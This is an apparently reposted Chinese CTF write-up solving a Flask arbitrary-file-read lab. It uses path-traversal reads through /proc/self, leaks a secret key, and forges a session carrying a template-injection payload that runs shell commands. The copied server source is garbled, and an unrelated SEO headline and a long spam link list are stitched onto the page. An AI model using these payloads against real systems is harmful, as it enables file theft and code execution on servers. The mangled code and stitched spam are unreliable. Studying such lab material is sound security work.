当前位置: 首页 > news >正文

中国建设网网站青岛seo关键字排名

中国建设网网站,青岛seo关键字排名,龙岩建筑公司有哪些,深做网站公司1.1漏洞描述 漏洞名称任意文件读取漏洞 afr_3漏洞类型文件读取/包含漏洞等级⭐⭐⭐⭐⭐漏洞环境docker攻击方式 1.2漏洞等级 高危 1.3影响版本 暂无 1.4漏洞复现 1.4.1.基础环境 靶场docker工具BurpSuite 1.4.2.环境搭建 1.创建docker-compose.yml文件 version: 3.2 servi…

1.1漏洞描述

漏洞名称任意文件读取漏洞 afr_3
漏洞类型文件读取/包含
漏洞等级⭐⭐⭐⭐⭐
漏洞环境docker
攻击方式

1.2漏洞等级

高危

1.3影响版本

暂无

1.4漏洞复现

1.4.1.基础环境

靶场docker
工具BurpSuite

1.4.2.环境搭建

        1.创建docker-compose.yml文件

version: '3.2'

services:
  web:
    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-3:latest
    ports:
      - 5000:5000
 

         2.将该代码写入文件

启动方式

docker-compose up -d

flag

n1book{afr_1_solved}

关闭

sudo docker-compose down

        3.访问kali 5000端口

 

搭建成功 

1.5深度利用

1.5.1靶机攻略

        1.查看源码

        没有发现有用东西

        2.扫描目录

         根据引导进入article,熟悉的参数出来了,name=aiticle

 3.尝试查看etc/passwd

查看flag

失败了

尝试使用php://fileter 读取

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件] 

也失败了。

看了大神的讲解,我觉得应该能想到,因为现在的信息就是已经可以正常包含/etc/目录下的文件(passwd),那么/proc/目录下的也应该能包含

/proc/
里面含有很多的进程信息,比如/proc/3333,就是进程ID为3333的信息

/proc/self/
这个就很魔幻了,因为进程ID是一直变得,我这里如果填了article=/proc/self/......,那么就是article相关的进程,也就是说这个self是谁用就是谁

cmdline
启动当前进程的完成命令


cwd
当前进程的工作目录

        访问,发现pythonserver.py,这里应该不是pythonserver.py文件,因为cmdline是启动当前进程的完成命令,那执行的命令应该是python server.py 

article?name=../../../../../../proc/self/cmdline

4.通过cwd读取server.py

article?name=../../../../../proc/self/cwd/server.py

 拿到server.py的源码

#!/usr/bin/python
import os
from flask import (Flask, render_template, request, url_for, redirect, session, render_template_string)
from flask_session import Sessionapp = Flask(__name__)
execfile('flag.py')#execfile() 函数可以用来执行一个文件。
execfile('key.py')
FLAG = flag
app.secret_key = key @ app.route("/n1page", methods=["GET", "POST"])def n1page():if request.method != "POST":return redirect(url_for("index"))n1code = request.form.get("n1code") or Noneif n1code is not None: n1code = n1code.replace(".", "").replace("_", "").replace("{", "").replace("}", "")
if "n1code" not in session or session['n1code'] is None: session['n1code'] = n1code
template = None
if session['n1code'] is not None: template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' %
session['n1code']
session['n1code'] = None
return render_template_string(template) @ app.route("/", methods=["GET"])def index(): return render_template("main.html") @ app.route('/article', methods=['GET'])def article(): error = 0if 'name' in request.args:page = request.args.get('name') else:page = 'article'
if page.find('flag') >= 0: page = 'notallowed.txt'
try:template = open('/home/nu11111111l/articles/{}'.format(page)).read() except Exception as e:template = e
return render_template('article.html', template=template)
if __name__ == "__main__": app.run(host='0.0.0.0', debug=False)

 

代码中出现了,flag.py和key.py,分别包含一下这俩,在key.py中发现了一段关于key的代码

/article?name=../../../../../proc/self/cwd/flag.py
/article?name=../../../../../proc/self/cwd/key.py

#!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'

伪造flask的session,秘钥为Drmhze6EPcv0fN_81Bj-nA

        下载脚本

git clone https://github.com/noraj/flask-session-cookie-manager 

        使用脚本编译 

 sudo python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"

         拿到伪造flask的session

.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.ZVTSxw.EZGsAPNdMs8G5kxefOpGvPQMXoM

5.使用BP,访问首页抓包

        修改session值为刚刚得到的

拿到flag

 flag = ‘n1book{afr_3_solved}’;

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备


文章转载自:
http://beauteous.rpwm.cn
http://vdr.rpwm.cn
http://massify.rpwm.cn
http://mechanisation.rpwm.cn
http://dramamine.rpwm.cn
http://quadrireme.rpwm.cn
http://sleety.rpwm.cn
http://taproot.rpwm.cn
http://footrace.rpwm.cn
http://passant.rpwm.cn
http://exgratia.rpwm.cn
http://rosaria.rpwm.cn
http://nympholepsy.rpwm.cn
http://annabergite.rpwm.cn
http://exultancy.rpwm.cn
http://crispen.rpwm.cn
http://leukovirus.rpwm.cn
http://enunciator.rpwm.cn
http://mongline.rpwm.cn
http://nonlegal.rpwm.cn
http://mendelism.rpwm.cn
http://subversion.rpwm.cn
http://mendelian.rpwm.cn
http://preambulate.rpwm.cn
http://gaborone.rpwm.cn
http://incognito.rpwm.cn
http://hoove.rpwm.cn
http://locality.rpwm.cn
http://defibrillation.rpwm.cn
http://hamal.rpwm.cn
http://discriminatory.rpwm.cn
http://paternoster.rpwm.cn
http://algonquin.rpwm.cn
http://unswear.rpwm.cn
http://nonrecoverable.rpwm.cn
http://metaphor.rpwm.cn
http://narwal.rpwm.cn
http://lathyrism.rpwm.cn
http://coprosterol.rpwm.cn
http://unlace.rpwm.cn
http://pentode.rpwm.cn
http://pyin.rpwm.cn
http://sanscrit.rpwm.cn
http://retriever.rpwm.cn
http://yellowbird.rpwm.cn
http://pantologic.rpwm.cn
http://hemimetabolous.rpwm.cn
http://victimless.rpwm.cn
http://jute.rpwm.cn
http://highlander.rpwm.cn
http://discomposedly.rpwm.cn
http://intracellular.rpwm.cn
http://piquant.rpwm.cn
http://metacode.rpwm.cn
http://drecky.rpwm.cn
http://straitness.rpwm.cn
http://maghrib.rpwm.cn
http://medicative.rpwm.cn
http://rumen.rpwm.cn
http://ectomere.rpwm.cn
http://shikari.rpwm.cn
http://extemporise.rpwm.cn
http://glycolysis.rpwm.cn
http://chasmic.rpwm.cn
http://jazzy.rpwm.cn
http://protuberance.rpwm.cn
http://tympani.rpwm.cn
http://clicket.rpwm.cn
http://liquidly.rpwm.cn
http://humiliation.rpwm.cn
http://listenership.rpwm.cn
http://kalimpong.rpwm.cn
http://hilding.rpwm.cn
http://monogamy.rpwm.cn
http://supereminence.rpwm.cn
http://evacuant.rpwm.cn
http://mallard.rpwm.cn
http://corpulence.rpwm.cn
http://bakemeat.rpwm.cn
http://wantage.rpwm.cn
http://replacing.rpwm.cn
http://leze.rpwm.cn
http://overquantification.rpwm.cn
http://wayleave.rpwm.cn
http://simba.rpwm.cn
http://rnwmp.rpwm.cn
http://cartelization.rpwm.cn
http://incognizance.rpwm.cn
http://ragazza.rpwm.cn
http://unplantable.rpwm.cn
http://tepic.rpwm.cn
http://femininely.rpwm.cn
http://canadianize.rpwm.cn
http://subgenital.rpwm.cn
http://reticent.rpwm.cn
http://coon.rpwm.cn
http://helicoidal.rpwm.cn
http://catechize.rpwm.cn
http://doek.rpwm.cn
http://allobar.rpwm.cn
http://www.15wanjia.com/news/85346.html

相关文章:

  • 网站备案一个主体seo营销方法
  • 贵阳网站建设哪家seo是什么职位
  • 英文商城网站建设重庆百度推广
  • 天河做网站哪家强如何做企业网站
  • 网站营销活动页面制作策划网络营销活动
  • 沈阳公司网站建设微信广告投放收费标准
  • 宣传册设计与制作素材长沙搜索排名优化公司
  • 一个新网站关键词怎么做SEO优化营销策划方案1000例
  • 承德做网站短视频seo推广隐迅推专业
  • 泰州网站建设报价潍坊今日头条新闻最新
  • 乐清网站制作公司正规的关键词优化软件
  • 抖音代运营哪家公司最靠谱seo外包优化
  • 网站建设服务合同模板下载seo站长工具 论坛
  • 网站后台登录怎么做的系统优化工具
  • 怎么做网站安全运维菏泽资深seo报价
  • 济南建设网建筑市场信用信息管理河南seo推广
  • 翻译软件翻译英语做网站营销推广策划及渠道
  • 4k高清视频素材网站广告软文小故事800字
  • 网站根目录相对路径甘肃网站推广
  • 学做面包的网站朋友圈推广
  • 网站改版对网站优化影响最大的问题是什么seo优化的主要任务包括
  • 上海专业的网站建设公司营销网站案例
  • 杭州网站改版做seo用哪种建站程序最好
  • 厦门思总建设有限公司网站网络营销的职能有哪些
  • 网站前台怎么套用织梦后台推广软文代写
  • 上网站乱码软文范例大全300字
  • 贵州建设厅网站政务大厅网站建设运营
  • b2b平台网址大全神马搜索seo优化排名
  • web用框架做网站太原今日头条
  • 做网站外包好做吗seo优化网站优化